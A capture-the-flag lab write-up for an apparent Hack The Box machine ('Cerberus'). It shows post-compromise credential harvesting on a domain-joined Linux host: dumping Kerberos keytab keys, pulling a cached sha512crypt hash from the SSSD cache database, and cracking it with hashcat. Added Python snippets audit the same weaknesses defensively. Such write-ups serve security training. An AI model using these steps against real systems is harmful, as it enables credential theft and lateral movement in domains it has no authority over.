Post Compromise


Now that the container host, icinga.cerberus.local, has been fully compromised, [[Cerberus_Pivoting#|pivoting]] to the DC host is necessary to explore the target domain further. Before pivoting, it is critical to assess the level of domain-wide privileges and the credentials available, given that the current host is a domain-joined Linux machine. Understanding which credentials are compromised and evaluating the potential for lateral movement within the domain is essential for informed, strategic exploration of the target environment.

keytab


root@icinga:/dev/shm# file /etc/krb5.keytab
/etc/krb5.keytab: Kerberos Keytab file, realm=CERBERUS.LOCAL, principal=ICINGA$/, type=91135, date=Sat Sep 20 07:30:08 2003, kvno=23

The /etc/krb5.keytab file is a crucial file on a Unix/Linux system that stores encrypted keys for Kerberos principals. It is used for secure authentication without requiring users to enter passwords interactively. Services and applications leverage this file to authenticate to the Kerberos Key Distribution Center (KDC) automatically. The file’s security is maintained by restricting access to privileged users, and it plays a key role in facilitating secure authentication within a Kerberos realm.

root@icinga:/dev/shm# klist -t -K -e -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Timestamp         Principal
---- ----------------- --------------------------------------------------------
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)

Since the keytab stores the keys for Kerberos principals (SPNs), it holds credentials, and its entries can be reviewed with the klist command. The three principals (ICINGA$, host/ICINGA and RestrictedKrbHost/ICINGA) all carry identical keys, so they are likely the machine account of the icinga.cerberus.local host.

While the machine account could be leveraged further, I will move on for now.
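As an added example that is not part of the original writeup, a short Python audit of the klist listing above: it parses each keytab entry, flags the deprecated arcfour-hmac (RC4) keys, and groups principals that share identical key material, which is how one can see they all belong to a single machine account. The sample listing is constructed from the output shown above, abbreviated to four entries; the parser and the audit function are my own.

```python
import re
from collections import defaultdict

# Constructed sample, abbreviated from the klist -t -K -e -k listing above
KLIST_OUTPUT = """\
Keytab name: FILE:/etc/krb5.keytab
KVNO Timestamp         Principal
---- ----------------- --------------------------------------------------------
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
"""

# One entry line: KVNO, timestamp, principal, (enctype), (0xkey)
ENTRY_RE = re.compile(
    r"^\s*(?P<kvno>\d+)\s+(?P<ts>\S+\s+\S+)\s+(?P<principal>\S+)\s+"
    r"\((?P<deprecated>DEPRECATED:)?(?P<enctype>[\w-]+)\)\s+\(0x(?P<key>[0-9a-fA-F]+)\)"
)

def parse_klist(text):
    """One dict per keytab entry; header and separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            d = m.groupdict()
            d["deprecated"] = d["deprecated"] is not None
            d["kvno"] = int(d["kvno"])
            entries.append(d)
    return entries

def audit_keytab(text):
    """What a defender wants from a keytab listing: weak enctypes and key reuse."""
    entries = parse_klist(text)
    by_key = defaultdict(set)  # key material -> principals that use it
    for e in entries:
        by_key[e["key"]].add(e["principal"])
    return {
        "principals": sorted({e["principal"] for e in entries}),
        "kvnos": sorted({e["kvno"] for e in entries}),
        # arcfour-hmac (RC4) entries: deprecated enctype, disable it on the account/KDC
        "deprecated": sorted((e["principal"], e["enctype"]) for e in entries if e["deprecated"]),
        # the same key under several principals => one account behind them (the host's machine account)
        "shared_keys": {k: sorted(p) for k, p in by_key.items() if len(p) > 1},
    }
```

Run against a full `klist -t -K -e -k` listing, the same function also surfaces multiple KVNOs, which indicates stale keys left behind after a machine-account password rotation.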

sssd


sssd (System Security Services Daemon) is a software suite designed for domain-joined Linux hosts. It facilitates seamless integration with remote directory services such as LDAP or Active Directory, enabling centralized authentication and user/group information management. SSSD supports offline authentication, caching to improve performance, and integrates with Pluggable Authentication Modules (PAM) and Name Service Switch (NSS) for a unified user experience. It plays a crucial role in providing secure, efficient, and centralized identity management for Linux systems within a domain environment.

config


root@icinga:~# ls /etc/sssd/
conf.d  sssd.conf
root@icinga:~# cat /etc/sssd/sssd.conf
 
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam
 
[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli 
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad

As the root user, I can check the sssd configuration file. Note the cache_credentials = True and krb5_store_password_if_offline = True settings: SSSD is configured to keep a local copy of domain credentials so that logins keep working while the AD server is unreachable.

lib


root@icinga:~# ll /var/lib/sss
total 40
drwxr-xr-x 10 root root 4096 Jan 22  2023 ./
drwxr-xr-x 38 root root 4096 Jan 29  2023 ../
drwx------  2 root root 4096 Mar  2  2023 db/
drwxr-x--x  2 root root 4096 Oct  4  2022 deskprofile/
drwxr-xr-x  2 root root 4096 Oct  4  2022 gpo_cache/
drwx------  2 root root 4096 Oct  4  2022 keytabs/
drwxrwxr-x  2 root root 4096 jan 17 07:01 mc/
drwxr-xr-x  3 root root 4096 jan 17 07:01 pipes/
drwxr-xr-x  3 root root 4096 jan 17 15:08 pubconf/
drwx------  2 root root 4096 Jan 22  2023 secrets/
 

The /var/lib/sss directory stores various SSSD data and caches. Most of it is restricted without root-level access. From an attacker's perspective, the most interesting subdirectories in /var/lib/sss are likely to be:

  1. db/: This directory contains the SQLite database files used by SSSD for caching. It may store cached user and group information retrieved from remote authentication sources. An attacker might explore this directory to extract sensitive identity data.
  2. keytabs/: The keytabs directory may contain keytab files, which are used for secure authentication. Attackers may be interested in obtaining these keytab files to impersonate or authenticate as users or services.
  3. secrets/: The secrets directory may contain sensitive information related to secrets and authentication. Exploring it could give an attacker additional details about how SSSD handles secret information (reading it requires both secrets.ldb and .secrets.mkey).

root@icinga:~# ll /var/lib/sss/*
/var/lib/sss/db:
total 5036
drwx------  2 root root    4096 Mar  2  2023 ./
drwxr-xr-x 10 root root    4096 Jan 22  2023 ../
-rw-r--r--  1 root root 1286144 jan 17 07:01 cache_cerberus.local.ldb
-rw-------  1 root root    2715 Mar  2  2023 ccache_CERBERUS.LOCAL
-rw-------  1 root root 1286144 jan 17 15:46 config.ldb
-rw-------  1 root root 1286144 Jan 22  2023 sssd.ldb
-rw-r--r--  1 root root 1286144 Mar  1  2023 timestamps_cerberus.local.ldb
 
/var/lib/sss/deskprofile:
total 8
drwxr-x--x  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/gpo_cache:
total 8
drwxr-xr-x  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/keytabs:
total 8
drwx------  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/mc:
total 27128
drwxrwxr-x  2 root root     4096 jan 17 07:01 ./
drwxr-xr-x 10 root root     4096 Jan 22  2023 ../
-rw-rw-r--  1 root root  6940392 jan 17 07:01 group
-rw-rw-r--  1 root root 11567160 jan 17 07:01 initgroups
-rw-rw-r--  1 root root  9253600 jan 17 07:01 passwd
 
/var/lib/sss/pipes:
total 12
drwxr-xr-x  3 root root 4096 jan 17 07:01 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
srw-rw-rw-  1 root root    0 jan 17 07:01 autofs=
srw-rw-rw-  1 root root    0 jan 17 07:01 nss=
srw-rw-rw-  1 root root    0 jan 17 07:01 pac=
srw-rw-rw-  1 root root    0 jan 17 07:01 pam=
drwxr-x---  2 root root 4096 jan 17 07:01 private/
srw-rw-rw-  1 root root    0 jan 17 07:01 ssh=
srw-rw----  1 root root    0 jan 17 07:01 sudo=
 
/var/lib/sss/pubconf:
total 16
drwxr-xr-x  3 root root 4096 jan 17 15:08 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
-rw-r--r--  1 root root   12 jan 17 15:08 kdcinfo.CERBERUS.LOCAL
drwxr-xr-x  2 root root 4096 jan 17 07:01 krb5.include.d/
 
/var/lib/sss/secrets:
total 1612
drwx------  2 root root    4096 Jan 22  2023 ./
drwxr-xr-x 10 root root    4096 Jan 22  2023 ../
-rw-------  1 root root 1638400 Mar  1  2023 secrets.ldb

Checking all the subdirectories, /var/lib/sss/db stands out as the most valuable, since it contains several databases.
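As an added example that is not part of the original writeup, a Python check for the two conditions reviewed in the config and lib sections above: whether sssd.conf enables offline credential caching (cache_credentials, krb5_store_password_if_offline) and whether any file in /var/lib/sss/db is readable by non-root users. The configuration and the directory listing are constructed from the output shown above (trimmed); the audit functions and their findings format are my own.

```python
import configparser
import re

# Constructed sample: the /etc/sssd/sssd.conf shown above, trimmed to the relevant keys
SSSD_CONF = """\
[sssd]
domains = cerberus.local

[domain/cerberus.local]
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
id_provider = ad
"""

# Constructed sample: the ll /var/lib/sss/db listing shown above
DB_LISTING = """\
-rw-r--r--  1 root root 1286144 jan 17 07:01 cache_cerberus.local.ldb
-rw-------  1 root root    2715 Mar  2  2023 ccache_CERBERUS.LOCAL
-rw-r--r--  1 root root 1286144 Mar  1  2023 timestamps_cerberus.local.ldb
"""

# ls -l fields: mode, link count, owner, group, size, three date/time fields, name
LS_RE = re.compile(r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+"
                   r"\s+\S+\s+\S+\s+\S+\s+(?P<name>.+)$")

def caching_settings(conf_text):
    """{domain: {option: bool}} for the two options that keep credentials on disk."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    watched = ("cache_credentials", "krb5_store_password_if_offline")
    return {s[len("domain/"):]: {o: cp.getboolean(s, o, fallback=False) for o in watched}
            for s in cp.sections() if s.startswith("domain/")}

def exposed_files(listing, owner="root"):
    """Regular files that group/other can read, or that are not owned by `owner`."""
    hits = []
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if m and m["mode"][0] == "-" and ("r" in m["mode"][4:] or m["owner"] != owner):
            hits.append(m["name"])
    return hits

def audit(conf_text, listing):
    """Findings a defender would raise: offline credential caching plus readable cache files."""
    findings = [f"{d}: {o}=True" for d, opts in caching_settings(conf_text).items()
                for o, on in opts.items() if on]
    findings += [f"{n}: readable by non-root users" for n in exposed_files(listing)]
    return findings
```

Per the listing above, cache_cerberus.local.ldb is mode 644, so the cached hash found later in this writeup would be readable by any local account, not only root; a 0600 mode on the db directory contents removes that exposure.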

database


root@icinga:/var/lib/sss/db# file *
cache_cerberus.local.ldb:      TDB database version 6, little-endian hash size 10000 bytes
ccache_CERBERUS.LOCAL:         data
config.ldb:                    TDB database version 6, little-endian hash size 10000 bytes
sssd.ldb:                      TDB database version 6, little-endian hash size 10000 bytes
timestamps_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes

Those .ldb files are TDB databases in binary format, and ccache_CERBERUS.LOCAL appears to be a TGT. In particular, cache_cerberus.local.ldb appears to hold cached data, which I can check for any information leak.

root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb
 
[...REDACTED...]
 
name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb
&DN=NAME=matthew@cerberus.local,CN=USERS,CN=CERBERUS.LOCAL,CN=SYSDB
name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb
createTimestamp
1677672476
gidNumber
1000
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
isPosix
TRUE
lastUpdate
1677672476
dataExpireTimestamp
initgrExpireTimestamp
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
lastCachedPasswordChange
1677672476
failedLoginAttempts
aExpireTimestamp
initgrExpireTimestamp
uidNumber
1000
 
[...REDACTED...]

The cache_cerberus.local.ldb file contains what appears to be a cached credential of the matthew user, with a UNIX password hash in sha512crypt ($6$) format: $6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0

This differs from the hash in the /etc/shadow file, which turned out not to be crackable.

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ hashcat -a 0 -m 1800 matthew.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
watchdog: Temperature abort trigger set to 90c
 
host memory required for this attack: 0 MB
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344386
* bytes.....: 139921519
* keyspace..: 14344386
 
$6$6lp9gyixjcovapcy$0qmzttjp9f2a0e7n4xk0l6zoekhhacnm0vgjnx/mu608qklimpiy1fwkzlyujazu3fz3.gq.4n6bb9pxe3t3t0:147258369
 
session..........: hashcat
status...........: Cracked
hash.mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
hash.target......: $6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCN...E3t3T0
time.started.....: Wed Jan 17 17:22:24 2024 (0 secs)
time.estimated...: Wed Jan 17 17:22:24 2024 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:     2487 H/s (9.36ms) @ Accel:128 Loops:1024 Thr:1 Vec:4
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 512/14344386 (0.00%)
rejected.........: 0/512 (0.00%)
restore.point....: 384/14344386 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:4096-5000
candidate.engine.: Device Generator
candidates.#1....: michael1 -> brandy
hardware.mon.#1..: Util: 26%
 
started: Wed Jan 17 17:22:23 2024
stopped: Wed Jan 17 17:22:26 2024

hashcat cracked the password hash of the matthew user. The cracked password is 147258369.